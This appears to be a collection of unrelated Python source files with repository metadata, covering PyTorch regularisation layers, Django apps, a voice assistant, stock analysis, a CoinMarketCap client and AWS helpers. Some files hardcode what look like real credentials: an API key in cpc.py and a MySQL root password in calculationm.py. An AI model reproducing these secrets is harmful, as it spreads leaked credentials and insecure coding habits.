120234f92e9f3f47d6c7e768b3ad2d1a50c3a3a5
|
cc5a11abbaddef1aa3feb29009e57ca335b9cf57
|
refs/heads/master
| 2021-01-13T23:48:59.598846
| 2020-02-22T18:26:19
| 2020-02-22T18:26:19
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,298
|
py
|
""" DropBlock, DropPath
PyTorch implementations of DropBlock and DropPath (Stochastic Depth) regularization layers.
Papers:
DropBlock: A regularization method for convolutional networks (https://arxiv.org/abs/1810.12890)
Deep Networks with Stochastic Depth (https://arxiv.org/abs/1603.09382)
Code:
DropBlock impl inspired by two Tensorflow impl that I liked:
- https://github.com/tensorflow/tpu/blob/master/models/official/resnet/resnet_model.py#L74
- https://github.com/clovaai/assembled-cnn/blob/master/nets/blocks.py
Hacked together by Ross Wightman
"""
import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
import math
def drop_block_2d(x, drop_prob=0.1, training=False, block_size=7, gamma_scale=1.0, drop_with_noise=False):
""" DropBlock. See https://arxiv.org/pdf/1810.12890.pdf
DropBlock with an experimental gaussian noise option. This layer has been tested on a few training
runs with success, but needs further validation and possibly optimization for lower runtime impact.
"""
if drop_prob == 0. or not training:
return x
_, _, height, width = x.shape
total_size = width * height
clipped_block_size = min(block_size, min(width, height))
# seed_drop_rate, the gamma parameter
seed_drop_rate = gamma_scale * drop_prob * total_size / clipped_block_size ** 2 / (
(width - block_size + 1) *
(height - block_size + 1))
# Forces the block to be inside the feature map.
w_i, h_i = torch.meshgrid(torch.arange(width).to(x.device), torch.arange(height).to(x.device))
valid_block = ((w_i >= clipped_block_size // 2) & (w_i < width - (clipped_block_size - 1) // 2)) & \
((h_i >= clipped_block_size // 2) & (h_i < height - (clipped_block_size - 1) // 2))
valid_block = torch.reshape(valid_block, (1, 1, height, width)).float()
uniform_noise = torch.rand_like(x, dtype=torch.float32)
block_mask = ((2 - seed_drop_rate - valid_block + uniform_noise) >= 1).float()
block_mask = -F.max_pool2d(
-block_mask,
kernel_size=clipped_block_size, # block_size, ???
stride=1,
padding=clipped_block_size // 2)
if drop_with_noise:
normal_noise = torch.randn_like(x)
x = x * block_mask + normal_noise * (1 - block_mask)
else:
normalize_scale = block_mask.numel() / (torch.sum(block_mask) + 1e-7)
x = x * block_mask * normalize_scale
return x
class DropBlock2d(nn.Module):
""" DropBlock. See https://arxiv.org/pdf/1810.12890.pdf
"""
def __init__(self,
drop_prob=0.1,
block_size=7,
gamma_scale=1.0,
with_noise=False):
super(DropBlock2d, self).__init__()
self.drop_prob = drop_prob
self.gamma_scale = gamma_scale
self.block_size = block_size
self.with_noise = with_noise
def forward(self, x):
return drop_block_2d(x, self.drop_prob, self.training, self.block_size, self.gamma_scale, self.with_noise)
def drop_path(x, drop_prob=0., training=False):
"""Drop paths (Stochastic Depth) per sample (when applied in main path of residual blocks).
This is the same as the DropConnect impl I created for EfficientNet, etc networks, however,
the original name is misleading as 'Drop Connect' is a different form of dropout in a separate paper...
See discussion: https://github.com/tensorflow/tpu/issues/494#issuecomment-532968956 ... I've opted for
changing the layer and argument names to 'drop path' rather than mix DropConnect as a layer name and use
'survival rate' as the argument.
"""
if drop_prob == 0. or not training:
return x
keep_prob = 1 - drop_prob
random_tensor = keep_prob + torch.rand((x.size()[0], 1, 1, 1), dtype=x.dtype, device=x.device)
random_tensor.floor_() # binarize
output = x.div(keep_prob) * random_tensor
return output
class DropPath(nn.ModuleDict):
"""Drop paths (Stochastic Depth) per sample (when applied in main path of residual blocks).
"""
def __init__(self, drop_prob=None):
super(DropPath, self).__init__()
self.drop_prob = drop_prob
def forward(self, x):
return drop_path(x, self.drop_prob, self.training)
|
[
"rwightman@gmail.com"
] |
rwightman@gmail.com
|
bc085641378bf880403d37ff53189561703ce8c0
|
406a432e49c5743443eaa8183076a78d43a13c5c
|
/tests/base/test_base_object.py
|
1218ea174091520a8a9506d495f70090f716e9e4
|
[] |
no_license
|
jpablo/superficie
|
ee4e0fafd048b3c73638673c0a535e74377ceacf
|
89f3429a942d1c0df6376d612b1243480084720a
|
refs/heads/master
| 2020-05-02T06:56:20.633622
| 2013-07-08T03:30:45
| 2013-07-08T03:30:45
| 1,643,874
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 413
|
py
|
import sys
import unittest
from superficie.base import BaseObject
class TestBaseObject(unittest.TestCase):
def test_BaseObject(self):
ob = BaseObject()
ob.show()
self.assertTrue(ob.visible)
ob.hide()
self.assertFalse(ob.visible)
ob.origin = (1,1,1)
self.assertTupleEqual(tuple(ob.origin), (1,1,1))
if __name__ == '__main__':
unittest.main()
|
[
"jpablo.romero@gmail.com"
] |
jpablo.romero@gmail.com
|
cefc05fd60c16b6ea1104ebe63259d9274b02629
|
3d853a74e2d5806e7c03b12adf01416c5a95df7e
|
/jarvis.py
|
681d556a34661ce874e7a0d3809b0fbc46548a85
|
[] |
no_license
|
stant581/JarvisAI
|
7064838442b93cc417365bc4e484ca938b9dcde8
|
e4edd4551c5aaef512e0d716a3b05644d108d45c
|
refs/heads/master
| 2020-07-13T19:36:16.945260
| 2019-08-29T10:43:52
| 2019-08-29T10:43:52
| 205,139,613
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,128
|
py
|
import pyttsx3 #pip install pyttsx3
import speech_recognition as sr #pip install speechRecognition
import datetime
import wikipedia #pip install wikipedia
import webbrowser
import os
import smtplib
engine = pyttsx3.init('sapi5')
voices = engine.getProperty('voices')
# print(voices[1].id)
engine.setProperty('voice', voices[0].id)
def speak(audio):
engine.say(audio)
engine.runAndWait()
def wishMe():
hour = int(datetime.datetime.now().hour)
if hour>=0 and hour<12:
speak("Good Morning!")
elif hour>=12 and hour<18:
speak("Good Afternoon!")
else:
speak("Good Evening!")
speak("I am Jarvis Sir. Please tell me how may I help you")
def takeCommand():
#It takes microphone input from the user and returns string output
r = sr.Recognizer()
with sr.Microphone() as source:
print("Listening...")
r.pause_threshold = 1
audio = r.listen(source)
try:
print("Recognizing...")
query = r.recognize_google(audio, language='en-in')
print(f"User said: {query}\n")
except Exception as e:
# print(e)
print("Say that again please...")
return "None"
return query
def sendEmail(to, content):
server = smtplib.SMTP('smtp.gmail.com', 587)
server.ehlo()
server.starttls()
server.login('youremail@gmail.com', 'your-password')
server.sendmail('youremail@gmail.com', to, content)
server.close()
if __name__ == "__main__":
wishMe()
while True:
# if 1:
query = takeCommand().lower()
# Logic for executing tasks based on query
if 'wikipedia' in query:
speak('Searching Wikipedia...')
query = query.replace("wikipedia", "")
results = wikipedia.summary(query, sentences=2)
speak("According to Wikipedia")
print(results)
speak(results)
elif 'open youtube' in query:
webbrowser.open("youtube.com")
elif 'open google' in query:
webbrowser.open("google.com")
elif 'open stackoverflow' in query:
webbrowser.open("stackoverflow.com")
elif 'play music' in query:
music_dir = 'D:\\Non Critical\\songs\\Favorite Songs2'
songs = os.listdir(music_dir)
print(songs)
os.startfile(os.path.join(music_dir, songs[0]))
elif 'the time' in query:
strTime = datetime.datetime.now().strftime("%H:%M:%S")
speak(f"Sir, the time is {strTime}")
elif 'open code' in query:
codePath = "C:\\Users\\Haris\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe"
os.startfile(codePath)
elif 'email to harry' in query:
try:
speak("What should I say?")
content = takeCommand()
to = "harryyourEmail@gmail.com"
sendEmail(to, content)
speak("Email has been sent!")
except Exception as e:
print(e)
speak("Sorry my friend harry bhai. I am not able to send this email")
|
[
"stant581@gmail.com"
] |
stant581@gmail.com
|
ec46aee80711bebc37c3c8b0d3662a0125abb993
|
445a7b33191b006d125c831b37278954d600c6f4
|
/chemlab/survey/migrations/0012_auto_20171025_2236.py
|
8314aa61d7288ad006976ddd55418f3eee2c8bc8
|
[] |
no_license
|
doggra/chemlab
|
669f72b9080d1e08b8dc9dc4f62477ffcb0e1356
|
8996f4c01938f29edfd1aca4c57189abfdfc092a
|
refs/heads/master
| 2021-07-19T10:02:19.640651
| 2017-10-25T23:37:01
| 2017-10-25T23:37:01
| 108,335,269
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 589
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.6 on 2017-10-25 22:36
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('survey', '0011_auto_20171025_2128'),
]
operations = [
migrations.RemoveField(
model_name='substancesurvey',
name='color',
),
migrations.AddField(
model_name='substancesurvey',
name='color',
field=models.ManyToManyField(blank=True, to='survey.Color'),
),
]
|
[
"Doggra"
] |
Doggra
|
10b0cb367fe9cfe352bbb33c3c15518d73793d26
|
99ada05e0088a8e93400b245c02fb0b28ef91a2d
|
/prototype_1/settings_development.py
|
2ddfbae5dd075df6398ee5a36f7db419aa7338cf
|
[
"MIT"
] |
permissive
|
eric-scott-owens/loopla
|
789fdf128393c29ced808b10e98eb55d5a0ed882
|
1fd5e6e7e9907198ff904111010b362a129d5e39
|
refs/heads/master
| 2022-12-12T17:30:44.373305
| 2019-08-01T06:17:05
| 2019-08-01T06:17:05
| 199,980,906
| 0
| 0
|
MIT
| 2022-12-11T00:23:28
| 2019-08-01T05:08:43
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 141
|
py
|
# Settings that are unique for localhost
from prototype_1.settings_shared import *
ALLOWED_HOSTS = ['127.0.0.1', 'localhost']
SITE_ID = 1
|
[
"eric.owens@loopla.com"
] |
eric.owens@loopla.com
|
eed768c5c1c19d00cc742271b1142a2d57a754c0
|
0bb119a63d0789f78fc8f371975920adc1f018b0
|
/crypto/cpc.py
|
9132650318a50b59a420cb7e46c0970f45b62884
|
[] |
no_license
|
suvranilghosh/Crypto-Search
|
ff1cf4515899d21769dea9bb9c56e953c9262133
|
ad05e51bb6791c9a9203c1be44085d5167cb182d
|
refs/heads/master
| 2023-04-29T20:06:57.839075
| 2021-05-15T01:48:14
| 2021-05-15T01:48:14
| 355,452,494
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 888
|
py
|
import requests
import json
headers = {
'X-CMC_PRO_API_KEY': 'ce2697eb-b5a1-43e3-800c-cfcc73debc90',
'Accepts': 'application/json',
}
def top100():
params = {'start': '1', 'limit': '100', 'convert': 'USD'}
url = 'https://pro-api.coinmarketcap.com/v1/cryptocurrency/listings/latest'
response = requests.get(url, params = params, headers = headers).json()
# print(response)
return response
def metaData(ticker):
params = {'symbol': ticker}
url = 'https://pro-api.coinmarketcap.com/v1/cryptocurrency/info'
response = requests.get(url, params = params, headers = headers).json()
# print (response)
return response
def priceData(ticker):
params ={'symbol':ticker}
url = 'https://pro-api.coinmarketcap.com/v1/cryptocurrency/quotes/latest'
response = requests.get(url, params = params, headers = headers).json()
return response
|
[
"sg1239@scarletmail.rutgers.edu"
] |
sg1239@scarletmail.rutgers.edu
|
9e8548713e54215e323eb85b01d2dd5df1e3e7f9
|
39f91dc49461df23550f292ee76249b26bcbcad4
|
/build/darknet_ros/catkin_generated/pkg.installspace.context.pc.py
|
712f62924ce78932da142da363af195cfff5688e
|
[] |
no_license
|
dkrystall/robosub_detection
|
efb997d5c87338c02bcb6dd59790d5a2717c8ca8
|
c1b70ab3017d2c367e8f458a5ee5870e815cc4e1
|
refs/heads/master
| 2022-12-01T23:40:59.044889
| 2021-01-21T19:50:20
| 2021-01-21T19:50:20
| 178,419,681
| 0
| 0
| null | 2022-11-22T05:46:45
| 2019-03-29T14:23:12
|
Makefile
|
UTF-8
|
Python
| false
| false
| 1,142
|
py
|
# generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "/home/david/yolocam_catkin_ws/install/include;/usr/include".split(';') if "/home/david/yolocam_catkin_ws/install/include;/usr/include" != "" else []
PROJECT_CATKIN_DEPENDS = "cv_bridge;roscpp;actionlib;rospy;std_msgs;darknet_ros_msgs;image_transport".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "-ldarknet_ros_lib;/usr/lib/x86_64-linux-gnu/libboost_thread.so;/usr/lib/x86_64-linux-gnu/libboost_chrono.so;/usr/lib/x86_64-linux-gnu/libboost_system.so;/usr/lib/x86_64-linux-gnu/libboost_date_time.so;/usr/lib/x86_64-linux-gnu/libboost_atomic.so;/usr/lib/x86_64-linux-gnu/libpthread.so".split(';') if "-ldarknet_ros_lib;/usr/lib/x86_64-linux-gnu/libboost_thread.so;/usr/lib/x86_64-linux-gnu/libboost_chrono.so;/usr/lib/x86_64-linux-gnu/libboost_system.so;/usr/lib/x86_64-linux-gnu/libboost_date_time.so;/usr/lib/x86_64-linux-gnu/libboost_atomic.so;/usr/lib/x86_64-linux-gnu/libpthread.so" != "" else []
PROJECT_NAME = "darknet_ros"
PROJECT_SPACE_DIR = "/home/david/yolocam_catkin_ws/install"
PROJECT_VERSION = "1.1.4"
|
[
"dkrystall@gmail.com"
] |
dkrystall@gmail.com
|
358ba3cb018955bbe7e4c0e735b0ced43f6cee3e
|
f0a8fdf752b0c11157a5a90c880891c7fb509456
|
/auto-download-voice/auto-download/background.py
|
ecf5ca49baf0c7737d76d8edb53e7e6e62ba0b79
|
[] |
no_license
|
legenove/MyLearn
|
abde5d610562ebb8bf1410ee6f9ba6391001126d
|
d05e28ac550eb2306c11bd38b8515f929199295d
|
refs/heads/master
| 2020-05-20T23:11:04.414953
| 2017-12-29T07:33:11
| 2017-12-29T07:33:11
| 46,164,926
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,720
|
py
|
# -*- coding: utf-8 -*-
# -*- coding: utf-8 -*-
import os
import sys
import logging
import requests
import signal
from Queue import Queue
from multiprocessing import Process
PROJECT_ROOT = os.path.realpath(os.path.dirname(__file__))
sys.path.insert(0, os.path.join(PROJECT_ROOT, "..", "site-packages"))
from redis_model.queue import Worker
from load_data import get_url, mp3_file
def do_download(data):
file_name = data.get('file_name')
vid = data.get('vid')
key = data.get('key')
source = data.get('source')
store_type = data.get('store_type')
status = data.get('status')
mp3_path = mp3_file + file_name + '/'
if not os.path.exists(mp3_path):
os.mkdir(mp3_path)
mp3_final_path = mp3_path + vid + ".mp3"
if os.path.exists(mp3_final_path):
logging.error(vid+":000::exist")
return
url = get_url(key, store_type=store_type, status=status, source=source)
if url:
r = requests.get(url, timeout=(30, 30))
if r.status_code >= 400:
logging.error(vid+":111::not found")
else:
try:
code = open(mp3_final_path, "wb")
code.write(r.content)
logging.error(data)
except e:
logging.error(e)
finally:
code.close()
else:
logging.error(vid+":33::not found")
if __name__ == "__main__":
worker = Worker("background_download.mp3")
try:
worker.register(do_download)
worker.start()
except KeyboardInterrupt:
worker.stop()
print "exited cleanly"
sys.exit(1)
except Exception, e:
print e
|
[
"396410414@qq.com"
] |
396410414@qq.com
|
080cb7aacc20ed7a3c0eb6ae9b77b35201f1418e
|
fcb45715217e8c8b5fa220bb94c0804289b18258
|
/pageload/pageload/views.py
|
d3d57896e5344fa9f6d83b2b308fa75b04a5c5ef
|
[] |
no_license
|
SriramAditya/PageLoad
|
c948bfaa80c449ca3917e4d7e3d263114cfba1fa
|
722251e938258950f2efc703106ac4870b2afe36
|
refs/heads/master
| 2021-03-18T19:59:23.489253
| 2020-03-13T15:06:17
| 2020-03-13T15:06:17
| 247,096,561
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,036
|
py
|
from django.shortcuts import render
from .forms import LoginForm
import json
with open('pageload.json') as d:
for item in d:
print("item:",item)
#data = json.load(d)
# Create your views here.
def home_page(request):
return render(request, 'index.html')
def login_page(request):
form = LoginForm()
if request.method == 'POST':
form = LoginForm(request.POST)
if form.is_valid():
return render(request, 'index.html', {})
else:
return render(request, 'login.html', {'form': form})
if request.method == 'GET':
form = LoginForm(request.GET)
if form.is_valid():
return render('index.html', {})
else:
return render(request, 'login.html', {'form': form})
def pageload(request):
f = open("pageload.json")
lines = f.readlines()
data = []
for v in lines:
d = json.loads(v)
data.append(d)
return render(request, 'pageload.html',{"data":data})
|
[
"adityasriram.b@gmail.com"
] |
adityasriram.b@gmail.com
|
37e2fadef932a626b9fd33bd0a3e0a3f1199ac99
|
c4116c2e8c411a9ab01065144e0e105f99f95313
|
/Database/SConscript.py
|
6f7f82bc564935887e976a0b307b7661ca9f0e26
|
[
"BSD-3-Clause"
] |
permissive
|
JeffersonLab/analyzer
|
aba8b4ce90b549b345daa81e731e44b0d704354b
|
a0613dcafa9efe42f759f5321cd0f8d2c633ba2f
|
refs/heads/master
| 2023-06-17T00:26:31.368749
| 2022-11-06T22:46:23
| 2022-11-06T22:46:23
| 13,133,237
| 9
| 61
|
BSD-3-Clause
| 2021-10-30T14:54:45
| 2013-09-26T20:14:27
|
C++
|
UTF-8
|
Python
| false
| false
| 504
|
py
|
###### Hall A Software database library SConscript Build File #####
from podd_util import build_library
Import('baseenv')
libname = 'PoddDB'
altname = 'Database'
src = """
Database.cxx
Textvars.cxx
VarType.cxx
"""
dbenv = baseenv.Clone()
dbenv.Replace(LIBS = [], RPATH=[])
# Database library
dblib = build_library(dbenv, libname, src,
extrahdrs = ['VarDef.h','Helper.h'],
dictname = altname,
versioned = True
)
|
[
"ole@jlab.org"
] |
ole@jlab.org
|
8eeaec3f066123a4a0d454dc2a40949cf1f173fc
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/nouns/_dictaphone.py
|
b80b2eac1bb94e10625867c6415784904aae4379
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379
| 2017-01-28T02:00:50
| 2017-01-28T02:00:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 399
|
py
|
#calss header
class _DICTAPHONE():
def __init__(self,):
self.name = "DICTAPHONE"
self.definitions = [u'a machine used in an office to record spoken words and later repeat them aloud so that they can be written down']
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.specie = 'nouns'
def run(self, obj1 = [], obj2 = []):
return self.jsondata
|
[
"xingwang1991@gmail.com"
] |
xingwang1991@gmail.com
|
737e6c3054715511afc3af4db17540ea8ce1dcf4
|
06c9faf8a8cf7b965a8be3c32d0d52fbd6b09d57
|
/ann.py
|
1266b3c1e7637b2757a8dd3efa1a2b17eec3536e
|
[] |
no_license
|
Chengchanghang/Pytorch
|
095672684d5c9e31be7fbc249cec5b2ae524e76c
|
0a5fdc82b857be12af5d22722872149be4433fc2
|
refs/heads/master
| 2021-07-05T19:16:15.593751
| 2017-10-01T13:54:11
| 2017-10-01T13:54:11
| 104,850,905
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,897
|
py
|
"""
View more, visit my tutorial page: https://morvanzhou.github.io/tutorials/
My Youtube Channel: https://www.youtube.com/user/MorvanZhou
Dependencies:
torch: 0.1.11
matplotlib
"""
import torch
from torch.autograd import Variable
import torch.nn.functional as F
import matplotlib.pyplot as plt
import gzip
import pickle
import numpy as np
import torch
import torch.nn as nn
from torch.autograd import Variable
import torch.utils.data as Data
import torchvision # 数据库模块
import matplotlib.pyplot as plt
torch.manual_seed(1) # reproducible
def vectorized_result(y):
z = np.zeros((10,))
z[y] = 1.0
return z
f = gzip.open('mnist.pkl.gz')
tr_d, va_d, te_d = pickle.load(f,encoding='bytes')
f.close()
training_inputs = [np.reshape(x, (784, )) for x in tr_d[0]]
training_results = [vectorized_result(y) for y in tr_d[1]]
traing_data = zip(training_inputs, training_results)
validation_inputs = [np.reshape(x, (784, )) for x in va_d[0]]
validation_data = zip(validation_inputs, va_d[1])
test_inputs = [np.reshape(x, (784, )) for x in te_d[0]]
test_data = zip(test_inputs, te_d[1])
tr_data = []
for x,y in traing_data:
x = torch.from_numpy(x)
xy = (x,y)
tr_data.append(xy)
class Net(torch.nn.Module):
def __init__(self, input_size=784,hidden_size=500,num_classes=10):
super(Net, self).__init__()
self.hidden = torch.nn.Linear(input_size, hidden_size)
self.predict = torch.nn.Linear(hidden_size,num_classes) # output layer
def forward(self, x):
x = F.relu(self.hidden(x)) # activation function for hidden layer
x = self.predict(x) # linear output
return x
net = Net() # define the network
print(net)
x,y = tr_data[1]
x = Variable(x)
b_y = torch.FloatTensor(y)
b_y = Variable(b_y)
optimizer = torch.optim.SGD(net.parameters(), lr=0.5)
loss_func = torch.nn.MSELoss()
|
[
"noreply@github.com"
] |
Chengchanghang.noreply@github.com
|
011fd1a9973de6c4af09cc8ab8ee1f8da121c33f
|
f646cf82090cba0139850dc6f4b5d978f2230f6c
|
/Fyyur-Website-Project-1/Study-SQL-and-Data-Modeling-for-the-Web/MigrationRay2/migrations/versions/22cb12ae1140_.py
|
bb60e2f6a33774d2dd17e788a862171c77181554
|
[] |
no_license
|
AmrElsersy/Full-Stack-Web-Nanodegree
|
7747ed6ed4e2e94d7b58d3f7f740e79568e31037
|
80fd0aec207420b9a0b907504402d9023f2d0d80
|
refs/heads/master
| 2023-04-16T23:59:58.939257
| 2020-07-17T00:16:58
| 2020-07-17T00:16:58
| 265,296,104
| 0
| 0
| null | 2021-05-06T20:20:11
| 2020-05-19T16:07:06
|
Python
|
UTF-8
|
Python
| false
| false
| 1,217
|
py
|
"""empty message
Revision ID: 22cb12ae1140
Revises: 6431fb45929f
Create Date: 2020-04-10 11:35:00.434018
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '22cb12ae1140'
down_revision = '6431fb45929f'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('study', sa.Column('id', sa.Integer(), nullable=True))
op.add_column('study', sa.Column('teacher_id', sa.Integer(), nullable=False))
op.drop_constraint('study_teacher.id_fkey', 'study', type_='foreignkey')
op.create_foreign_key(None, 'study', 'teacher', ['teacher_id'], ['id'])
op.drop_column('study', 'teacher.id')
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('study', sa.Column('teacher.id', sa.INTEGER(), autoincrement=False, nullable=False))
op.drop_constraint(None, 'study', type_='foreignkey')
op.create_foreign_key('study_teacher.id_fkey', 'study', 'teacher', ['teacher.id'], ['id'])
op.drop_column('study', 'teacher_id')
op.drop_column('study', 'id')
# ### end Alembic commands ###
|
[
"amrelsersay@gmail.com"
] |
amrelsersay@gmail.com
|
f98ca3bf65ac7627757a4e80f0e7f1c903551a1a
|
b14ccf1330dddc9a2f6b481c1767b3200be92072
|
/contr6/urls.py
|
675b42246a5403b30d81fc05353af54c1e2a8a09
|
[] |
no_license
|
da5tan93/6_lab
|
e138df52c755c8ff5bddfb3f783b6d1954f39d8a
|
3f78a02618b5f0a26a6637ce58a8dd987f3db143
|
refs/heads/master
| 2020-07-29T22:16:01.319480
| 2019-09-21T13:11:59
| 2019-09-21T13:11:59
| 209,982,074
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,204
|
py
|
"""contr6 URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from webapp.views import index_view, visitor_view, visitor_create_view, visitor_update_view, \
visitor_delete_view
urlpatterns = [
path('admin/', admin.site.urls),
path('', index_view, name='index'),
path('visitor/<int:pk>/', visitor_view, name='visitor_view'),
path('visitor/add/', visitor_create_view, name='visitor_add'),
path('visitor/<int:pk>/update/', visitor_update_view, name='visitor_update'),
path('visitor/<int:pk>/delete/', visitor_delete_view, name='visitor_delete'),
]
|
[
"dos5n@ya.ru"
] |
dos5n@ya.ru
|
34da0a797dfe842d60344fff363419bb1f40b7b6
|
c139820c3c8ed92ef575022fcfd40e9848913d53
|
/calculationm.py
|
d95dfe44a4c630088db76364cb0864f728870ccb
|
[] |
no_license
|
418011010/2020
|
d9116f693618ce6b0dad2f5a33c9f4b90d475552
|
983a4b771fa11fcc7a43c80db106a4faf156a6b5
|
refs/heads/master
| 2022-11-29T08:23:21.253682
| 2020-08-07T03:17:54
| 2020-08-07T03:17:54
| 263,866,870
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,718
|
py
|
#-*-coding:utf-8-*-
import numpy as np
from pandas import DataFrame
import pandas as pd
from sqlalchemy import create_engine
import pymysql
from tqdm import tqdm
import time
import mysql.connector
pymysql.install_as_MySQLdb()
#自定义格式转换
def convert_currency(value):
"""
转换字符为float类型
如果转换失败,返回0
"""
try:
return np.float(value)
except Exception:
return 0
ce = create_engine("mysql+mysqlconnector://root:coship@localhost:3306/stock", encoding='utf-8')
tabsql = "show tables"
dmtables = pd.read_sql_query(tabsql, con=ce)
tables = dmtables['Tables_in_stock'].values.tolist()
#print(np.array(tables))
tables.remove('stname')
tables.remove('stock_sh.000001')
tables.remove('stock_sh.000002')
tables.remove('stock_sh.000003')
tables.remove('stock_sz.399001')
sql1 = "SELECT date,code,pctChg FROM `stock_sh.000001`"
data1 = pd.read_sql_query(sql1, con=ce)
sql2 = "SELECT date,code,pctChg FROM `stock_sz.399001`"
data2 = pd.read_sql_query(sql2, con=ce)
data2['pctChg'] = data2['pctChg'].apply(convert_currency)
#print(data2.dtypes)
pbar = tqdm(tables)
for t in pbar:
pbar.set_description("processing %s" % t)
#print(t)
if t[7] == 'h':
sql3 = "SELECT date,code,pctChg FROM `%s`" % t
data3 = pd.read_sql_query(sql3, con=ce)
data3['pctChg'] = data3['pctChg'].apply(convert_currency)
comb = pd.concat([data1, data3], axis=1, join='inner', ignore_index=True)
comb = comb.drop_duplicates().T.drop_duplicates().T
comb['v'] = 0
comb.loc[(comb[2] <= 0) & (comb.loc[:, 5] >= 3), ['v']] = 1
if comb['v'].sum() >= 30:
print(t)
print(comb['v'].sum())
elif t[7] == 'z':
sql4 = "SELECT date,code,pctChg FROM `%s`" % t
data4 = pd.read_sql_query(sql4, con=ce)
data4['pctChg'] = data4['pctChg'].apply(convert_currency)
comb = pd.concat([data2, data4], axis=1, join='inner', ignore_index=True)
comb = comb.drop_duplicates().T.drop_duplicates().T
comb['v'] = 0
comb.loc[(comb[2] <= 0) & (comb.loc[:, 5] >= 3), ['v']] = 1
if comb['v'].sum() >= 30:
print(t)
print(comb['v'].sum())
# #拼接
# sql3 = "SELECT date,code,pctChg FROM `stock_sh.600004`"
# data3 = pd.read_sql_query(sql3, con=ce)
# data3['pctChg'] = data3['pctChg'].astype(np.float64)
# #print(data3)
# comb = pd.concat([data2, data3], axis=1, join='inner', ignore_index=True)
# comb = comb.drop_duplicates().T.drop_duplicates().T
# comb['vv'] = 0
# comb.loc[(comb[2] >= 2) & (comb.loc[:, 5] >= 3), ['vv']] = 1
# print(comb['vv'].sum())
# print(comb.loc[(comb.loc[:, 2] >= 2) & (comb.loc[:, 5] >= 3)])
|
[
"418011010@qq.com"
] |
418011010@qq.com
|
0f1c79040c8c98280ff6bb41dd29ca5438094195
|
ac6373b39ef103d0e605c365a53c609fd6c72a36
|
/packages/@aws-cdk/custom-resources/test/provider-framework/integration-test-fixtures/s3-assert-handler/index.py
|
a5e9321c895eaa568537476739dee95fbdd04ab4
|
[
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
joeykilpatrick/aws-cdk
|
7810fb4576ab7b8ff44587f75ffc0676d7b4808f
|
92fb853ea7d31e7bf3d60bd50ce18b95c4189da6
|
refs/heads/master
| 2021-05-25T17:43:49.463556
| 2020-04-07T09:59:07
| 2020-04-07T09:59:07
| 253,850,929
| 2
| 0
|
Apache-2.0
| 2020-04-07T16:28:26
| 2020-04-07T16:28:25
| null |
UTF-8
|
Python
| false
| false
| 922
|
py
|
import boto3
s3 = boto3.client('s3')
def on_event(event, ctx):
print(event)
def is_complete(event, ctx):
print(event)
# nothing to assert if this resource is being deleted
if event['RequestType'] == 'Delete':
return { 'IsComplete': True }
props = event['ResourceProperties']
bucket_name = props['BucketName']
object_key = props['ObjectKey']
expected_content = props['ExpectedContent']
print("reading content from s3://%s/%s" % (bucket_name, object_key))
content = None
try:
result = s3.get_object(Bucket=bucket_name, Key=object_key)
content = result['Body'].read().decode('utf-8')
except s3.exceptions.NoSuchKey:
print("file not found")
pass
print("actual content: %s" % content)
print("expected content: %s" % expected_content)
is_equal = content == expected_content
if is_equal:
print("s3 content matches expected")
return { 'IsComplete': is_equal }
|
[
"37929162+mergify[bot]@users.noreply.github.com"
] |
37929162+mergify[bot]@users.noreply.github.com
|
39df28df03435665a7bf280677b4063988e5ad01
|
c5712ae1d10f36e1daf450d45e0b6c8728f3bee9
|
/APIMV/wsgi.py
|
28d5f09bc989dce5e01837b3e1c7f4eca4361c67
|
[] |
no_license
|
SalvadorLopezGomez/moviles_tercer_corte_api
|
fbaeb2833c1f078213f2129685875a6ffab7df9b
|
79372dad80054b55139e775c33d11472e269fb1b
|
refs/heads/master
| 2022-04-14T11:48:35.148048
| 2020-04-07T08:32:13
| 2020-04-07T08:32:13
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 387
|
py
|
"""
WSGI config for APIMV project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'APIMV.settings')
